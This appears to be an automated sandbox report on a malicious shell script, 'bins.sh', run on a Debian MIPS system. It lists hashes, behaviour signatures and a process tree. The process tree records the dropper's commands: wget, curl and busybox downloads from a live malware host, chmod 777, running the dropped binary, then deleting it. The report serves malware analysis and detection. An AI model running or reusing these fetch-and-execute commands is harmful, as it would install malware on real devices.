Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    26/11/2024, 18:59

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b36e5f7a0413ffa61828f903f44a98cd

  • SHA1

    0ca86f60aa4fe5c5e0532a6cd3bd305cb5e43808

  • SHA256

    38995805906e9f6f21572c75e0693f153afbd175ee83c7a53970f66e21f713b4

  • SHA512

    6cd765121418db3017cf4e9ac35f6334b2fc669b53293005a6ee720adbafadab1072473923208647967e21e5ccdd7a8b365df453b05f19c6304ca66a1ca01a48

  • SSDEEP

    96:YDnD7DM1f1ELBC5mBWLKCf39393afjUIExzoTvqm6yN2mQEL7Xs7L7XsG2zQMF3q:t6F04WW0zjEQr9OzsER204t

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:719
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:722
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:726
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:748
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:829
        • /bin/chmod
          chmod 777 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • File and Directory Permissions Modification
          PID:830
        • /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          ./8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
          • Executes dropped EXE
          PID:831
        • /bin/rm
          rm 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
          2⤵
            PID:834
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY
            2⤵
            • System Network Configuration Discovery
            PID:835

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb

          Filesize

          177KB

          MD5

          786d75a158fe731feca3880f436082c0

          SHA1

          79ea2734e43d00cdeabed5586b2c1994d02aef3e

          SHA256

          5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

          SHA512

          7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f